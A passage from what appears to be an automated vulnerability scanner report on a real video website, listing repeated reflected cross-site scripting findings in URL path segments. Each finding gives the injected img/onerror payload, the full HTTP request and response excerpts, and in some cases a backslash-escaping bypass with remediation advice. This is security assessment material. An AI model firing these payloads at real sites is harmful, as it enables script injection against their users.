Host:   http://en.video.canoe.tv
Path:   /video/comedy/tv-bloopers/88729112001/the-price-is-right-miracle/5196372001

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8030e"><img%20src%3da%20onerror%3dalert(1)>6ff88039dd was submitted in the REST URL parameter 2. This input was echoed as 8030e"><img src=a onerror=alert(1)>6ff88039dd in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /video/comedy8030e"><img%20src%3da%20onerror%3dalert(1)>6ff88039dd/tv-bloopers/88729112001/the-price-is-right-miracle/5196372001 HTTP/1.1
Host: en.video.canoe.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 25 Nov 2010 03:46:56 GMT
Server: Apache
Set-Cookie: PHPSESSID=a4286691543c1556bad0fedd0587a86c; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: PHPSESSID=a4286691543c1556bad0fedd0587a86c; path=/; httponly
Set-Cookie: a4286691543c1556bad0fedd0587a86c=userdata%7Ca%3A5%3A%7Bs%3A19%3A%22video_name_urlified%22%3Bs%3A26%3A%22the-price-is-right-miracle%22%3Bs%3A8%3A%22video_id%22%3Bi%3A5196372001%3Bs%3A11%3A%22page_number%22%3Bs%3A1%3A%221%22%3Bs%3A11%3A%22playlist_id%22%3Bs%3A11%3A%2288729112001%22%3Bs%3A16%3A%22default_video_id%22%3Bs%3A10%3A%225196372001%22%3B%7D; path=/; httponly
POOL: videoserver-prod-01
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 72844

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta name="medium" content
...[SNIP]...
<a href="http://en.video.canoe.tv/video/comedy8030egtltimg-srca-onerroralert1gt6ff88039dd/tv-bloopers/88729112001" title="Comedy8030e"><img src=a onerror=alert(1)>6ff88039dd" id="crumb_section">
...[SNIP]...

2.68. http://en.video.canoe.tv/video/comedy/tv-bloopers/88729112001/the-price-is-right-miracle/5196372001 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://en.video.canoe.tv
Path:   /video/comedy/tv-bloopers/88729112001/the-price-is-right-miracle/5196372001

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 38197<img%20src%3da%20onerror%3dalert(1)>c942ba4345e was submitted in the REST URL parameter 2. This input was echoed as 38197<img src=a onerror=alert(1)>c942ba4345e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /video/comedy38197<img%20src%3da%20onerror%3dalert(1)>c942ba4345e/tv-bloopers/88729112001/the-price-is-right-miracle/5196372001 HTTP/1.1
Host: en.video.canoe.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 25 Nov 2010 03:47:07 GMT
Server: Apache
Set-Cookie: PHPSESSID=fed7b0ea61d3b48de43e51263b11ca7e; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: PHPSESSID=fed7b0ea61d3b48de43e51263b11ca7e; path=/; httponly
Set-Cookie: fed7b0ea61d3b48de43e51263b11ca7e=userdata%7Ca%3A5%3A%7Bs%3A19%3A%22video_name_urlified%22%3Bs%3A26%3A%22the-price-is-right-miracle%22%3Bs%3A8%3A%22video_id%22%3Bi%3A5196372001%3Bs%3A11%3A%22page_number%22%3Bs%3A1%3A%221%22%3Bs%3A11%3A%22playlist_id%22%3Bs%3A11%3A%2288729112001%22%3Bs%3A16%3A%22default_video_id%22%3Bs%3A10%3A%225196372001%22%3B%7D; path=/; httponly
POOL: videoserver-prod-01
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 72609

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta name="medium" content
...[SNIP]...
<img src=a onerror=alert(1)>c942ba4345e" id="crumb_section">Comedy38197<img src=a onerror=alert(1)>c942ba4345e</a>
...[SNIP]...

2.69. http://en.video.canoe.tv/video/comedy/tv-bloopers/88729112001/the-price-is-right-miracle/5196372001 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://en.video.canoe.tv
Path:   /video/comedy/tv-bloopers/88729112001/the-price-is-right-miracle/5196372001

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 859c5\'%3b0b5714855ce was submitted in the REST URL parameter 2. This input was echoed as 859c5\\';0b5714855ce in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defense is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string the the backslash character should be blocked, or escaped by replacing it with two backslashes.

Request

GET /video/comedy859c5\'%3b0b5714855ce/tv-bloopers/88729112001/the-price-is-right-miracle/5196372001 HTTP/1.1
Host: en.video.canoe.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 25 Nov 2010 03:47:01 GMT
Server: Apache
Set-Cookie: PHPSESSID=b928efed82a44717b1ac4224cdaee0fc; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: PHPSESSID=b928efed82a44717b1ac4224cdaee0fc; path=/; httponly
Set-Cookie: b928efed82a44717b1ac4224cdaee0fc=userdata%7Ca%3A5%3A%7Bs%3A19%3A%22video_name_urlified%22%3Bs%3A26%3A%22the-price-is-right-miracle%22%3Bs%3A8%3A%22video_id%22%3Bi%3A5196372001%3Bs%3A11%3A%22page_number%22%3Bs%3A1%3A%221%22%3Bs%3A11%3A%22playlist_id%22%3Bs%3A11%3A%2288729112001%22%3Bs%3A16%3A%22default_video_id%22%3Bs%3A10%3A%225196372001%22%3B%7D; path=/; httponly
POOL: videoserver-prod-02
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 72213

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta name="medium" content
...[SNIP]...
<![CDATA[

function OmnitureVariables(){
   this.mainsection = 'video';
   this.sectionLevel2 = 'Comedy859c5\\';0b5714855ce'; // modified by VIDEO APP
   this.sectionLevel3 = 'TV Bloopers'; // modified by VIDEO APP
   this.sectionLevel4 = 'The Price is Right Miracle'; // modified by VIDEO APP
   this.sectionLevel5 = '';
   this.se
...[SNIP]...

2.70. http://en.video.canoe.tv/video/comedy/tv-bloopers/88729112001/the-price-is-right-miracle/5196372001 [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://en.video.canoe.tv
Path:   /video/comedy/tv-bloopers/88729112001/the-price-is-right-miracle/5196372001

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d5744"><img%20src%3da%20onerror%3dalert(1)>dfe06be9ae0 was submitted in the REST URL parameter 3. This input was echoed as d5744"><img src=a onerror=alert(1)>dfe06be9ae0 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /video/comedy/tv-bloopersd5744"><img%20src%3da%20onerror%3dalert(1)>dfe06be9ae0/88729112001/the-price-is-right-miracle/5196372001 HTTP/1.1
Host: en.video.canoe.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 25 Nov 2010 03:47:15 GMT
Server: Apache
Set-Cookie: PHPSESSID=a9992dc632ca23a3c87cef8d5b6f4c72; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: PHPSESSID=a9992dc632ca23a3c87cef8d5b6f4c72; path=/; httponly
Set-Cookie: a9992dc632ca23a3c87cef8d5b6f4c72=userdata%7Ca%3A5%3A%7Bs%3A19%3A%22video_name_urlified%22%3Bs%3A26%3A%22the-price-is-right-miracle%22%3Bs%3A8%3A%22video_id%22%3Bi%3A5196372001%3Bs%3A11%3A%22page_number%22%3Bs%3A1%3A%221%22%3Bs%3A11%3A%22playlist_id%22%3Bs%3A11%3A%2288729112001%22%3Bs%3A16%3A%22default_video_id%22%3Bs%3A10%3A%225196372001%22%3B%7D; path=/; httponly
POOL: videoserver-prod-01
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 72549

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta name="medium" content
...[SNIP]...
<a href="http://en.video.canoe.tv/video/comedy/tv-bloopersd5744"><img src=a onerror=alert(1)>dfe06be9ae0/88729112001/page/2">
...[SNIP]...

2.71. http://en.video.canoe.tv/video/comedy/tv-bloopers/88729112001/wheel-of-fortune-idiots/22186674001 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://en.video.canoe.tv
Path:   /video/comedy/tv-bloopers/88729112001/wheel-of-fortune-idiots/22186674001

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2ebe2"><img%20src%3da%20onerror%3dalert(1)>5bbad39924e was submitted in the REST URL parameter 2. This input was echoed as 2ebe2"><img src=a onerror=alert(1)>5bbad39924e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /video/comedy2ebe2"><img%20src%3da%20onerror%3dalert(1)>5bbad39924e/tv-bloopers/88729112001/wheel-of-fortune-idiots/22186674001 HTTP/1.1
Host: en.video.canoe.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 25 Nov 2010 03:46:25 GMT
Server: Apache
Set-Cookie: PHPSESSID=2286c058123718ec3ebcfafa0736ca46; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: PHPSESSID=2286c058123718ec3ebcfafa0736ca46; path=/; httponly
Set-Cookie: 2286c058123718ec3ebcfafa0736ca46=userdata%7Ca%3A5%3A%7Bs%3A19%3A%22video_name_urlified%22%3Bs%3A23%3A%22wheel-of-fortune-idiots%22%3Bs%3A8%3A%22video_id%22%3Bi%3A22186674001%3Bs%3A11%3A%22page_number%22%3Bs%3A1%3A%221%22%3Bs%3A11%3A%22playlist_id%22%3Bs%3A11%3A%2288729112001%22%3Bs%3A16%3A%22default_video_id%22%3Bs%3A11%3A%2222186674001%22%3B%7D; path=/; httponly
POOL: videoserver-prod-01
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 72891

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta name="medium" content
...[SNIP]...
<a href="http://en.video.canoe.tv/video/comedy2ebe2gtltimg-srca-onerroralert1gt5bbad39924e/tv-bloopers/88729112001" title="Comedy2ebe2"><img src=a onerror=alert(1)>5bbad39924e" id="crumb_section">
...[SNIP]...

2.72. http://en.video.canoe.tv/video/comedy/tv-bloopers/88729112001/wheel-of-fortune-idiots/22186674001 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://en.video.canoe.tv
Path:   /video/comedy/tv-bloopers/88729112001/wheel-of-fortune-idiots/22186674001

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 327bb<img%20src%3da%20onerror%3dalert(1)>11653feaac3 was submitted in the REST URL parameter 2. This input was echoed as 327bb<img src=a onerror=alert(1)>11653feaac3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /video/comedy327bb<img%20src%3da%20onerror%3dalert(1)>11653feaac3/tv-bloopers/88729112001/wheel-of-fortune-idiots/22186674001 HTTP/1.1
Host: en.video.canoe.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 25 Nov 2010 03:46:33 GMT
Server: Apache
Set-Cookie: PHPSESSID=64fb330b7b69ef0fc9593930f4e9b19d; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: PHPSESSID=64fb330b7b69ef0fc9593930f4e9b19d; path=/; httponly
Set-Cookie: 64fb330b7b69ef0fc9593930f4e9b19d=userdata%7Ca%3A5%3A%7Bs%3A19%3A%22video_name_urlified%22%3Bs%3A23%3A%22wheel-of-fortune-idiots%22%3Bs%3A8%3A%22video_id%22%3Bi%3A22186674001%3Bs%3A11%3A%22page_number%22%3Bs%3A1%3A%221%22%3Bs%3A11%3A%22playlist_id%22%3Bs%3A11%3A%2288729112001%22%3Bs%3A16%3A%22default_video_id%22%3Bs%3A11%3A%2222186674001%22%3B%7D; path=/; httponly
POOL: videoserver-prod-01
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 72778

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta name="medium" content
...[SNIP]...
<img src=a onerror=alert(1)>11653feaac3" id="crumb_section">Comedy327bb<img src=a onerror=alert(1)>11653feaac3</a>
...[SNIP]...

2.73. http://en.video.canoe.tv/video/comedy/tv-bloopers/88729112001/wheel-of-fortune-idiots/22186674001 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://en.video.canoe.tv
Path:   /video/comedy/tv-bloopers/88729112001/wheel-of-fortune-idiots/22186674001

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d42c1\'%3b50ed6b76637 was submitted in the REST URL parameter 2. This input was echoed as d42c1\\';50ed6b76637 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defense is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string the the backslash character should be blocked, or escaped by replacing it with two backslashes.

Request

GET /video/comedyd42c1\'%3b50ed6b76637/tv-bloopers/88729112001/wheel-of-fortune-idiots/22186674001 HTTP/1.1
Host: en.video.canoe.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 25 Nov 2010 03:46:28 GMT
Server: Apache
Set-Cookie: PHPSESSID=4c77c93afe9709cdacf949bae6f7eb89; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: PHPSESSID=4c77c93afe9709cdacf949bae6f7eb89; path=/; httponly
Set-Cookie: 4c77c93afe9709cdacf949bae6f7eb89=userdata%7Ca%3A5%3A%7Bs%3A19%3A%22video_name_urlified%22%3Bs%3A23%3A%22wheel-of-fortune-idiots%22%3Bs%3A8%3A%22video_id%22%3Bi%3A22186674001%3Bs%3A11%3A%22page_number%22%3Bs%3A1%3A%221%22%3Bs%3A11%3A%22playlist_id%22%3Bs%3A11%3A%2288729112001%22%3Bs%3A16%3A%22default_video_id%22%3Bs%3A11%3A%2222186674001%22%3B%7D; path=/; httponly
POOL: videoserver-prod-02
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 72363

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta name="medium" content
...[SNIP]...
<![CDATA[

function OmnitureVariables(){
   this.mainsection = 'video';
   this.sectionLevel2 = 'Comedyd42c1\\';50ed6b76637'; // modified by VIDEO APP
   this.sectionLevel3 = 'TV Bloopers'; // modified by VIDEO APP
   this.sectionLevel4 = 'Wheel of Fortune idiots'; // modified by VIDEO APP
   this.sectionLevel5 = '';
   this.secti
...[SNIP]...

2.74. http://en.video.canoe.tv/video/comedy/tv-bloopers/88729112001/wheel-of-fortune-idiots/22186674001 [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://en.video.canoe.tv
Path:   /video/comedy/tv-bloopers/88729112001/wheel-of-fortune-idiots/22186674001

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ffdd5"><img%20src%3da%20onerror%3dalert(1)>ce1d461803a was submitted in the REST URL parameter 3. This input was echoed as ffdd5"><img src=a onerror=alert(1)>ce1d461803a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /video/comedy/tv-bloopersffdd5"><img%20src%3da%20onerror%3dalert(1)>ce1d461803a/88729112001/wheel-of-fortune-idiots/22186674001 HTTP/1.1
Host: en.video.canoe.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 25 Nov 2010 03:46:37 GMT
Server: Apache
Set-Cookie: PHPSESSID=dbbb663fabb3668ed559769a3db49688; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: PHPSESSID=dbbb663fabb3668ed559769a3db49688; path=/; httponly
Set-Cookie: dbbb663fabb3668ed559769a3db49688=userdata%7Ca%3A5%3A%7Bs%3A19%3A%22video_name_urlified%22%3Bs%3A23%3A%22wheel-of-fortune-idiots%22%3Bs%3A8%3A%22video_id%22%3Bi%3A22186674001%3Bs%3A11%3A%22page_number%22%3Bs%3A1%3A%221%22%3Bs%3A11%3A%22playlist_id%22%3Bs%3A11%3A%2288729112001%22%3Bs%3A16%3A%22default_video_id%22%3Bs%3A11%3A%2222186674001%22%3B%7D; path=/; httponly
POOL: videoserver-prod-02
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 72290

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta name="medium" content
...[SNIP]...
<a href="http://en.video.canoe.tv/video/comedy/tv-bloopersffdd5"><img src=a onerror=alert(1)>ce1d461803a/88729112001/page/2">
...[SNIP]...

2.75. http://en.video.canoe.tv/video/comedy/tv-bloopers/88729112001/wheel-of-fortune-one-letter-winner/670340060001 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://en.video.canoe.tv
Path:   /video/comedy/tv-bloopers/88729112001/wheel-of-fortune-one-letter-winner/670340060001

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ce035"><img%20src%3da%20onerror%3dalert(1)>f3a8bd32ff6 was submitted in the REST URL parameter 2. This input was echoed as ce035"><img src=a onerror=alert(1)>f3a8bd32ff6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /video/comedyce035"><img%20src%3da%20onerror%3dalert(1)>f3a8bd32ff6/tv-bloopers/88729112001/wheel-of-fortune-one-letter-winner/670340060001 HTTP/1.1
Host: en.video.canoe.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 25 Nov 2010 03:45:54 GMT
Server: Apache
Set-Cookie: PHPSESSID=ea01e8ae860c3a40969f4b0d5fbec50c; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: PHPSESSID=ea01e8ae860c3a40969f4b0d5fbec50c; path=/; httponly
Set-Cookie: ea01e8ae860c3a40969f4b0d5fbec50c=userdata%7Ca%3A5%3A%7Bs%3A19%3A%22video_name_urlified%22%3Bs%3A34%3A%22wheel-of-fortune-one-letter-winner%22%3Bs%3A8%3A%22video_id%22%3Bi%3A670340060001%3Bs%3A11%3A%22page_number%22%3Bs%3A1%3A%221%22%3Bs%3A11%3A%22playlist_id%22%3Bs%3A11%3A%2288729112001%22%3Bs%3A16%3A%22default_video_id%22%3Bs%3A12%3A%22670340060001%22%3B%7D; path=/; httponly
POOL: videoserver-prod-01
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 73187

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta name="medium" content
...[SNIP]...
<a href="http://en.video.canoe.tv/video/comedyce035gtltimg-srca-onerroralert1gtf3a8bd32ff6/tv-bloopers/88729112001" title="Comedyce035"><img src=a onerror=alert(1)>f3a8bd32ff6" id="crumb_section">
...[SNIP]...

2.76. http://en.video.canoe.tv/video/comedy/tv-bloopers/88729112001/wheel-of-fortune-one-letter-winner/670340060001 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://en.video.canoe.tv
Path:   /video/comedy/tv-bloopers/88729112001/wheel-of-fortune-one-letter-winner/670340060001

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 53e05<img%20src%3da%20onerror%3dalert(1)>f0cff34a331 was submitted in the REST URL parameter 2. This input was echoed as 53e05<img src=a onerror=alert(1)>f0cff34a331 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /video/comedy53e05<img%20src%3da%20onerror%3dalert(1)>f0cff34a331/tv-bloopers/88729112001/wheel-of-fortune-one-letter-winner/670340060001 HTTP/1.1
Host: en.video.canoe.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 25 Nov 2010 03:46:02 GMT
Server: Apache
Set-Cookie: PHPSESSID=6f40334ca0b28eeae73809f05cff02df; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: PHPSESSID=6f40334ca0b28eeae73809f05cff02df; path=/; httponly
Set-Cookie: 6f40334ca0b28eeae73809f05cff02df=userdata%7Ca%3A5%3A%7Bs%3A19%3A%22video_name_urlified%22%3Bs%3A34%3A%22wheel-of-fortune-one-letter-winner%22%3Bs%3A8%3A%22video_id%22%3Bi%3A670340060001%3Bs%3A11%3A%22page_number%22%3Bs%3A1%3A%221%22%3Bs%3A11%3A%22playlist_id%22%3Bs%3A11%3A%2288729112001%22%3Bs%3A16%3A%22default_video_id%22%3Bs%3A12%3A%22670340060001%22%3B%7D; path=/; httponly
POOL: videoserver-prod-01
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 72824

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta name="medium" content
...[SNIP]...
<img src=a onerror=alert(1)>f0cff34a331" id="crumb_section">Comedy53e05<img src=a onerror=alert(1)>f0cff34a331</a>
...[SNIP]...

2.77. http://en.video.canoe.tv/video/comedy/tv-bloopers/88729112001/wheel-of-fortune-one-letter-winner/670340060001 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://en.video.canoe.tv
Path:   /video/comedy/tv-bloopers/88729112001/wheel-of-fortune-one-letter-winner/670340060001

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a7c99\'%3b78cf9b72472 was submitted in the REST URL parameter 2. This input was echoed as a7c99\\';78cf9b72472 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defense is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string the the backslash character should be blocked, or escaped by replacing it with two backslashes.

Request

GET /video/comedya7c99\'%3b78cf9b72472/tv-bloopers/88729112001/wheel-of-fortune-one-letter-winner/670340060001 HTTP/1.1
Host: en.video.canoe.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 25 Nov 2010 03:45:58 GMT
Server: Apache
Set-Cookie: PHPSESSID=83e5069283c64ca158c4dbb756380978; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: PHPSESSID=83e5069283c64ca158c4dbb756380978; path=/; httponly
Set-Cookie: 83e5069283c64ca158c4dbb756380978=userdata%7Ca%3A5%3A%7Bs%3A19%3A%22video_name_urlified%22%3Bs%3A34%3A%22wheel-of-fortune-one-letter-winner%22%3Bs%3A8%3A%22video_id%22%3Bi%3A670340060001%3Bs%3A11%3A%22page_number%22%3Bs%3A1%3A%221%22%3Bs%3A11%3A%22playlist_id%22%3Bs%3A11%3A%2288729112001%22%3Bs%3A16%3A%22default_video_id%22%3Bs%3A12%3A%22670340060001%22%3B%7D; path=/; httponly
POOL: videoserver-prod-01
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 72775

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta name="medium" content
...[SNIP]...
<![CDATA[

function OmnitureVariables(){
   this.mainsection = 'video';
   this.sectionLevel2 = 'Comedya7c99\\';78cf9b72472'; // modified by VIDEO APP
